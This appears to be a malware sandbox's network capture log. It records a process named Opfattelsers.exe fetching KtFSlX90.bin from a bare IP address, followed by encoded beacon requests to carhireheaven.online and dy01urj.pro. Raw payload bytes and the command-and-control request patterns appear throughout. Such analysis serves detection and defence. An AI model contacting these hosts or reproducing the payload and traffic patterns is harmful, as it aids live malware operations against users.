                                                                          Dec 10, 2024 13:53:14.366961956 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.367019892 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.367060900 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.368443966 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.368486881 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.368618965 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.368657112 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.369966984 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.370011091 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.370199919 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.370239019 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.371387005 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.371432066 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.371457100 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.371490955 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.372843981 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.372899055 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.372961044 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.372999907 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.374459982 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.374502897 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.374591112 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.374633074 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.376054049 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.376102924 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.376321077 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.376364946 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.377360106 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.377424002 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.377459049 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.377501011 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.378820896 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.378858089 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.378952980 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.378995895 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.380367994 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.380413055 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.380496025 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.380541086 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.381881952 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.381926060 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.382004023 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.382054090 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.383320093 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.383361101 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.383517027 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.383562088 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.385123968 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.385166883 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.385356903 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.385396004 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.386670113 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.386709929 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.386746883 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.386790037 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.387794971 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.387861013 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.387953043 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.387995005 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.389347076 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.389394999 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.389410973 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.389452934 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.390778065 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.390825987 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.390995979 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.391038895 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.392410994 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.392458916 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.392483950 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.392527103 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.393975019 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.394023895 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.394079924 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.394124031 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.395246983 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.395302057 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.395354986 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.395399094 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.396754980 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.396797895 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.396802902 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.396847010 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:30.264404058 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:40.690046072 CET4991580192.168.2.6165.22.38.185
                                                                          Dec 10, 2024 13:53:40.811393023 CET8049915165.22.38.185192.168.2.6
                                                                          Dec 10, 2024 13:53:40.811583042 CET4991580192.168.2.6165.22.38.185
                                                                          Dec 10, 2024 13:53:40.822480917 CET4991580192.168.2.6165.22.38.185
                                                                          Dec 10, 2024 13:53:40.941878080 CET8049915165.22.38.185192.168.2.6
                                                                          Dec 10, 2024 13:53:41.898101091 CET8049915165.22.38.185192.168.2.6
                                                                          Dec 10, 2024 13:53:41.898230076 CET8049915165.22.38.185192.168.2.6
                                                                          Dec 10, 2024 13:53:41.898305893 CET4991580192.168.2.6165.22.38.185
                                                                          Dec 10, 2024 13:53:41.941762924 CET4991580192.168.2.6165.22.38.185
                                                                          Dec 10, 2024 13:53:42.061160088 CET8049915165.22.38.185192.168.2.6
                                                                          Dec 10, 2024 13:53:57.491626978 CET4995480192.168.2.6154.88.22.104
                                                                          Dec 10, 2024 13:53:57.613888025 CET8049954154.88.22.104192.168.2.6
                                                                          Dec 10, 2024 13:53:57.616000891 CET4995480192.168.2.6154.88.22.104
                                                                          Dec 10, 2024 13:53:57.714418888 CET4995480192.168.2.6154.88.22.104
                                                                          Dec 10, 2024 13:53:57.837344885 CET8049954154.88.22.104192.168.2.6
                                                                          Dec 10, 2024 13:53:59.133605957 CET8049954154.88.22.104192.168.2.6
                                                                          Dec 10, 2024 13:53:59.133795977 CET8049954154.88.22.104192.168.2.6
                                                                          Dec 10, 2024 13:53:59.133846045 CET4995480192.168.2.6154.88.22.104
                                                                          Dec 10, 2024 13:53:59.218873978 CET4995480192.168.2.6154.88.22.104
                                                                          Dec 10, 2024 13:54:00.238439083 CET4996180192.168.2.6154.88.22.104
                                                                          Dec 10, 2024 13:54:00.359044075 CET8049961154.88.22.104192.168.2.6
                                                                          Dec 10, 2024 13:54:00.359122992 CET4996180192.168.2.6154.88.22.104
                                                                          Dec 10, 2024 13:54:01.365315914 CET4996180192.168.2.6154.88.22.104
                                                                          Dec 10, 2024 13:54:01.486558914 CET8049961154.88.22.104192.168.2.6
                                                                          Dec 10, 2024 13:54:01.890028000 CET8049961154.88.22.104192.168.2.6
                                                                          Dec 10, 2024 13:54:01.890254021 CET8049961154.88.22.104192.168.2.6
                                                                          Dec 10, 2024 13:54:01.890374899 CET4996180192.168.2.6154.88.22.104
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 10, 2024 13:53:40.169543982 CET5942653192.168.2.61.1.1.1
                                                                          Dec 10, 2024 13:53:40.681787968 CET53594261.1.1.1192.168.2.6
                                                                          Dec 10, 2024 13:53:57.026607990 CET5502453192.168.2.61.1.1.1
                                                                          Dec 10, 2024 13:53:57.445919037 CET53550241.1.1.1192.168.2.6
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 10, 2024 13:53:40.169543982 CET192.168.2.61.1.1.10x548dStandard query (0)www.carhireheaven.onlineA (IP address)IN (0x0001)false
                                                                          Dec 10, 2024 13:53:57.026607990 CET192.168.2.61.1.1.10x6079Standard query (0)www.dy01urj.proA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 10, 2024 13:53:40.681787968 CET1.1.1.1192.168.2.60x548dNo error (0)www.carhireheaven.onlinecarhireheaven.onlineCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2024 13:53:40.681787968 CET1.1.1.1192.168.2.60x548dNo error (0)carhireheaven.online165.22.38.185A (IP address)IN (0x0001)false
                                                                          Dec 10, 2024 13:53:57.445919037 CET1.1.1.1192.168.2.60x6079No error (0)www.dy01urj.pro154.88.22.104A (IP address)IN (0x0001)false
                                                                          • 212.162.149.66
                                                                          • www.carhireheaven.online
                                                                          • www.dy01urj.pro
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649850212.162.149.66805204C:\Users\user\AppData\Local\Temp\Opfattelsers.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 10, 2024 13:53:12.422146082 CET171OUTGET /KtFSlX90.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: 212.162.149.66
                                                                          Cache-Control: no-cache
                                                                          Dec 10, 2024 13:53:13.567116022 CET1236INHTTP/1.1 200 OK
                                                                          Content-Type: application/octet-stream
                                                                          Last-Modified: Tue, 10 Dec 2024 08:30:03 GMT
                                                                          Accept-Ranges: bytes
                                                                          ETag: "c1867eb5dd4adb1:0"
                                                                          Server: Microsoft-IIS/8.5
                                                                          Date: Tue, 10 Dec 2024 12:53:14 GMT
                                                                          Content-Length: 287808
                                                                          Data Raw: 4b 7a 29 bb 61 f6 1a 6a 70 c3 e1 55 16 e0 31 61 e6 1d ac 03 27 77 7e 17 94 75 b9 06 ee aa 45 d7 9c 24 d8 24 60 19 d9 2c 11 7a cc 4d fb 9b 1c b0 ce c7 59 4a 5f 6c 12 ea 04 54 d3 2e 33 91 19 a4 cb 3d 83 33 33 83 76 bc 86 eb d3 33 59 1b a0 84 b8 0a 85 cc 8a 52 25 ef fa ae e6 e4 82 24 f0 0b d1 2d 63 58 78 99 03 58 a7 cc 92 d4 d5 e5 36 92 b9 8c 9c d5 a1 a7 e5 d2 a5 94 bc 08 82 26 31 06 4e fa 69 12 99 2e dd 9b 6f 2f ec 33 eb d7 51 4f fc f6 dc 53 5f 64 ba 9f 8d 33 95 bd c8 e8 d9 14 5b 81 a9 88 9b 6f a8 7a 0b 79 b5 0d 17 6d 90 a0 e5 f1 d5 1a a1 21 20 05 42 60 18 b3 fd d1 4a 19 f6 74 94 f8 4b dc 24 b8 f6 ba 5d 3e 47 50 0e 0d 72 0f cd 6b e7 0d 32 10 b3 fa 3f 99 33 81 36 4f 85 72 2a 86 39 e6 2e 7f 94 67 5f 8d 9b 86 15 15 5c 6b d6 bd 61 fa d5 00 02 cd 93 3c ef f9 02 7c 27 a6 59 c9 55 2c a9 0a 11 a9 0a 1b 20 74 78 e3 1c 93 b5 8a 50 64 13 64 b5 be 7b 4a 14 e4 fb 24 61 03 b7 0e d6 81 31 30 34 17 20 f2 70 87 35 19 13 bc 9f a4 4c cc ed 83 e5 b0 36 83 be 3e 8e e2 6e 61 25 8a 44 9d bf 6a 1c 33 2f c2 17 dc 3c a3 0f 37 [TRUNCATED]
                                                                          Data Ascii: Kz)ajpU1a'w~uE$$`,zMYJ_lT.3=33v3YR%$-cXxX6&1Ni.o/3QOS_d3[ozym! B`JtK$]>GPrk2?36Or*9.g_\ka<|'YU, txPdd{J$a104 p5L6>na%Dj3/<7*'`=~b<|~a f>gi&#gkAZ$[<rHenhj63Ngo=Q>`O*OjhX`h4&f|/<6t|#{3H\{SG#`;n2Oz`Uz*G;'A&#DtLQ)S*Mo^h_OpPe@F~iB(4iIP@EAtYNjzS8(mc`3];IUnydk_rgAv#KZ,4853xL0?ebF>xg-D1Vno*)ptj1~5M<3A#J'GHmED$>c>t?~_IVR|T90~h#T=6oK_=Gg>n`ksFcs;d)e8Vn#i_cLM$F=~v{\qxZ
                                                                          Dec 10, 2024 13:53:13.567136049 CET1236INData Raw: 2e e4 ee bf cf 05 cc 25 79 a5 c5 c6 7c 56 df b9 e2 81 27 20 dd b1 22 e5 38 25 76 77 19 b8 72 9a 1e 26 db c5 38 45 06 0d 13 b7 6e ed 8e 62 d9 a7 c7 e5 c3 01 7f 0b ad 46 43 e0 09 5e 33 5e 40 33 a4 e5 ab 35 11 a6 7f 71 09 4c a7 97 4b e2 7e 9c 9b 6c
                                                                          Data Ascii: .%y|V' "8%vwr&8EnbFC^3^@35qLK~l}VQZ"~m!9lQHl>l'y7:'y:R-DEQ*!F!a;!)?@&vknzeS@Hg30v3R%$
                                                                          Dec 10, 2024 13:53:13.567148924 CET1236INData Raw: 56 51 d9 02 d0 dd c0 df 9b 5a ce 22 7e 6d 21 fa b2 39 f6 9a fa 6c 06 cd da 51 9a 88 48 a2 8b 6c ed 8f 3e 6c de e2 01 27 79 37 ec d4 f6 97 3a 27 ba b7 79 db 3a ff 8b 52 f9 2d 80 ce 82 f4 44 45 c7 51 dc fa 2a 16 21 bb 46 a1 e8 ca af 21 61 3b ba e2
                                                                          Data Ascii: VQZ"~m!9lQHl>l'y7:'y:R-DEQ*!F!a;!)?@&vknzeS@Hg30v3R%$-cXxX6:&1@VN&'#-^{/+-S",-f`
                                                                          Dec 10, 2024 13:53:13.567159891 CET1236INData Raw: 76 09 6b 1c c4 80 bb 6e 9b 07 7a a8 ee 65 88 ea d2 c6 f8 f5 80 d6 53 ea 40 f1 48 86 67 13 33 30 83 76 bc 82 eb d3 33 a6 e4 a0 84 00 0a 85 cc 8a 52 25 ef ba ae e6 e4 82 24 f0 0b d1 2d 63 58 78 99 03 58 a7 cc 92 d4 d5 e5 36 92 b9 8c 9c d5 a1 a7 e5
                                                                          Data Ascii: vknzeS@Hg30v3R%$-cXxX6:&1@VN&'#-^{/+-S",-f`JuXvCK:z0ihemU\jQuI<r\kaR<|`^U,tzP6d
                                                                          Dec 10, 2024 13:53:13.567173004 CET896INData Raw: 58 e3 21 95 ac aa af 60 04 7c f7 37 ff 20 1e 4f 3d ca 32 08 17 98 07 34 a8 21 dc 8a 5f ba d2 5e 34 6e 7f 15 64 1d 1b 10 db 97 39 22 c3 80 30 23 b1 7f 8f af d5 65 69 2f da fa 88 26 c1 5c 87 48 b7 2b 76 bc 36 1d 0c 9f e6 d3 9f 7f 33 39 2d 49 b1 8b
                                                                          Data Ascii: X!`|7 O=24!_^4nd9"0#ei/&\H+v639-INM~&Ten".n,]1esVZoD{.,I'VS104,Atme,kg6MA/UUv~@QFNd'=w,1<|n}
                                                                          Dec 10, 2024 13:53:13.597273111 CET1236INData Raw: 5d 26 db 8d 4d b8 8b 88 77 4b 91 12 de 8a f9 b6 c7 e5 4a 44 9f 86 e8 ca 13 88 26 00 33 5e a8 0c 58 1a 54 b8 94 3a 82 8e f6 1c 2a d2 c7 88 6a cc 73 e1 e8 ca 7d d8 80 b9 dd 72 e5 4f a5 a9 24 39 8f 55 f9 3d 20 64 0a 26 b4 70 6d 21 79 76 15 7f 1f 5e
                                                                          Data Ascii: ]&MwKJD&3^XT:*js}rO$9U= d&pm!yv^2Wu]"w72:wHNtp2}Xz0+s5Oa;Qxf,OJz&0ka0dr<#0%'.?f}dn\hHX$/*%qc**^>
                                                                          Dec 10, 2024 13:53:13.597295046 CET1236INData Raw: 00 02 bb 7c 22 1d fe 4f a5 34 ec d4 a6 7f 46 d2 45 48 f2 ae c6 7c 4f 5a 06 fb 0b 06 3a 9c 11 45 c7 d4 15 f5 6e de 9a 26 51 a1 e8 47 e6 21 d9 66 fb ae 8f 63 fd c3 fa fe fc df cb fc 7e 9d 16 68 c6 b1 6b e4 30 10 c6 21 23 0b 38 4b 67 de d9 71 b8 08
                                                                          Data Ascii: |"O4FEH|OZ:En&QG!fc~hk0!#8Kgq?Lt$+#7ndRKucXx#>$2V]>?H,C2.Sb/oJsg-hzrvN=`=6J[*0ihEy
                                                                          Dec 10, 2024 13:53:13.597306013 CET1236INData Raw: b8 bc b3 cd 21 9b 46 5e d7 69 0d 4d fe bc 43 96 51 25 ef b5 28 64 e6 82 24 60 80 8c 8d e6 83 0c 86 e8 5f 2a 68 b6 d4 d5 e5 36 2a 80 02 7f ed 56 4c 24 28 a6 1f 66 c9 d1 39 32 dc 35 08 5a 41 39 95 62 ca 41 43 ec 7f 26 f9 aa b8 41 87 fc 23 2e 56 d5
                                                                          Data Ascii: !F^iMCQ%(d$`_*h6*VL$(f925ZA9bAC&A#.Vds^Y-S8#4xd">Iuv3NAimUgX-]^>/SD*jRU[`aU,"O*E\S;?mkY:.og7R~u^0`@K$
                                                                          Dec 10, 2024 13:53:13.597491026 CET1236INData Raw: 8a 9f 8e 21 a7 63 1a 2c 81 5b 57 1e a2 f2 a1 14 ad 69 b3 77 5e 1e 5c a3 6c 90 f2 67 82 16 39 b6 1e 99 56 87 8b a0 df e0 f9 b9 68 3f df 36 67 1f a6 1b 34 4d 6e 2b 42 5f af 6e 19 94 48 fb dd ef fc 65 77 3f f1 28 b6 0e 3c ad d3 1b 2d b8 e4 6a d6 bd
                                                                          Data Ascii: !c,[Wiw^\lg9Vh?6g4Mn+B_nHew?(<-ja.tu5s!OD",l)@A3'@de-$:pme<,mU*j%;aKcFO~A3}Ba#gfu&!dvf,ck#RI$_WK
                                                                          Dec 10, 2024 13:53:13.597502947 CET1236INData Raw: bf eb cc a2 cb 0b 77 22 ef 4c 6a 81 6e cc f1 8c 96 c7 2b 3f b4 50 36 af 61 6b c0 33 bd fd 25 01 21 8a dd 76 e7 c9 92 fb 45 d9 ec 69 0e fb c6 6d 9c d3 d8 31 97 97 f5 2b f7 d5 31 cd 3e b7 3e 8e 9f 75 d8 99 83 44 9d 94 a1 a4 8e e7 0e db 29 dd 28 42
                                                                          Data Ascii: w"Ljn+?P6ak3%!vEim1+1>>uD)(B4V|kZP}Ji\:u;!Jsxk;o9aK0v$}P<Nt"bYZxu:&Q\Xe=^L"Uw9Ddv@EkU1%Io
                                                                          Dec 10, 2024 13:53:13.686558008 CET1236INData Raw: 89 2b bf 89 cc b3 76 e0 20 47 d1 0f 84 00 f4 f6 2a 84 18 dd 7e 69 e8 9d 74 3e ee c9 b6 3e bd 1d c4 a4 ab fa 2d c9 f0 f4 29 9d 6c ca 4d 9b fd f4 fd de 2e f1 9f 9d 19 4a f6 3e b1 47 d3 61 31 af de 95 62 39 00 f7 19 6d 9d da 4d 91 ab 3a 61 67 a7 ac
                                                                          Data Ascii: +v G*~it>>-)lM.J>Ga1b9mM:aggna/T#YYht&IEf6sFveM6._pdELznQ*;\pK3=^h:"51m[E^S_~~!^#Gp


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649915165.22.38.185804184C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 10, 2024 13:53:40.822480917 CET515OUTGET /rym4/?uVKlz=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&RPITK=DxtTE6 HTTP/1.1
                                                                          Host: www.carhireheaven.online
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                          Dec 10, 2024 13:53:41.898101091 CET321INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.24.0 (Ubuntu)
                                                                          Date: Tue, 10 Dec 2024 12:53:41 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 162
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.649954154.88.22.104804184C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 10, 2024 13:53:57.714418888 CET763OUTPOST /f425/ HTTP/1.1
                                                                          Host: www.dy01urj.pro
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Origin: http://www.dy01urj.pro
                                                                          Referer: http://www.dy01urj.pro/f425/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 210
                                                                          Connection: close
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                          Data Raw: 75 56 4b 6c 7a 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 69 5a 71 37 68 4a 67 52 55 6d 4b 33 66 4d 45 39 68 48 47 65 4e 69 39 39 5a 6d 35 51 73 43 4f 71 7a 42 35 41 59 51 4b 75 38 54 70 2f 4d 7a 45 50 45 4c 43 72 66 4a 34 6a 61 68 74 5a 7a 52 62 64 76 62 57 48 2b 42 52 61 71 56 35 79 5a 2f 64 67 63 7a 76 53 61 48 44 4c 76 32 41 67 2b 69 55 42 45 36 75 35 45 73 6c 4f 4f 6d 4c 71 6c 55 65 38 62 51 7a 6a 77 37 2f 44 6f 4d 52 4b 53 37 39 32 76 44 56 68 32 6b 61 75 7a 34 53 39 71 42 70 55 36 6d 42 62 36 35 7a 6f 66 7a 58 5a 73 6f 46 32 53 38 4b 4f 31 67 35 56 48 33 49 63 32 76 53 62 37 47 6f 54 4e 65 52 77 54 63 38 42 73 33 4d 56
                                                                          Data Ascii: uVKlz=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV
                                                                          Dec 10, 2024 13:53:59.133605957 CET364INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Tue, 10 Dec 2024 12:53:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 d9 7e 46 be a6 3e b9 41 a6 be 2e 6e f9 a9 21 81 a5 c9 1e 5e 65 fe 59 e9 a6 be 21 ae b6 ea 9a 36 fa 50 13 01 d5 3c 51 f2 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~F>A.n!^eY!6P<QZ0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.649961154.88.22.104804184C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 10, 2024 13:54:01.365315914 CET787OUTPOST /f425/ HTTP/1.1
                                                                          Host: www.dy01urj.pro
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Origin: http://www.dy01urj.pro
                                                                          Referer: http://www.dy01urj.pro/f425/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 234
                                                                          Connection: close
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                          Data Raw: 75 56 4b 6c 7a 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 6b 49 36 37 74 4c 49 52 53 47 4b 30 54 73 45 39 76 6e 47 43 4e 69 35 39 5a 6e 39 36 73 77 61 71 7a 68 70 41 5a 52 4b 75 78 7a 70 2f 43 54 45 4b 5a 62 44 47 66 4a 6b 64 61 67 68 5a 7a 52 50 64 76 65 71 48 2f 32 46 64 72 46 35 4b 56 66 64 69 42 44 76 53 61 48 44 4c 76 77 74 46 2b 69 4d 42 59 62 2b 35 48 4e 6c 4e 48 47 4c 70 79 6b 65 38 4b 67 7a 6e 77 37 2f 39 6f 4e 4e 67 53 39 78 32 76 43 6c 68 32 52 6d 74 6b 6f 53 37 6b 68 6f 6a 71 6e 34 63 32 35 32 6b 44 31 2f 32 33 35 46 7a 61 71 58 55 70 54 35 32 56 6e 6f 65 32 74 4b 70 37 6d 6f 35 50 65 70 77 42 4c 77 6d 6a 44 70 32 6b 43 30 57 34 4f 50 70 4a 73 32 64 73 77 70 37 39 74 53 7a 42 77 3d 3d
